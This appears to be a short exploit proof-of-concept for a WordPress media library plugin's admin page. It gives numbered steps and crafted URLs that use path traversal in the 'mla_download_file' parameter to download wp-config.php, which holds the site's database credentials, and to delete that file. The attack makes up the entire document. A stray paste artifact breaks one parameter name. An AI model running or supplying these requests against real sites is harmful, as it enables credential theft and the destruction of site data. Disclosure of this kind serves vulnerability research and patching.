1 - Log in with administrator / editor / author user.
2 - Access url: http://target/wp-admin/upload.php?page=mla-menu
3 - Capture a url to download some picture.
4 - Change and insert parameters to attack and run in url. Example:
http://target/wp-admin/upload.php?mla_admin_nonce=01dc26b197&page=mla-menu&mla_download_file=%2Fsrv%2Fwww%2Fwordpress-develop%2Fpublic_html%2Fsrc%2Fwp-content%2Fuploads%2Fstar-wars-5.jpg&mla_download_type=image/jpeg
Only to Download File:
http://target/wp-admin/upload.php?mla_admin_nonce=01dc26b197&page=mla-menu&mla_download_file=../wp-config.php&mla_download_type=application/force-download
To delete File:
http://target/wp-admin/upload.php?mla_admin_nonce=01dc26b197&page=mla-menu&mla_download_file=../wp-config.php&mla_download_type=application/force-download&mla_download_dispositio%MCEPASTEBIN%n=delete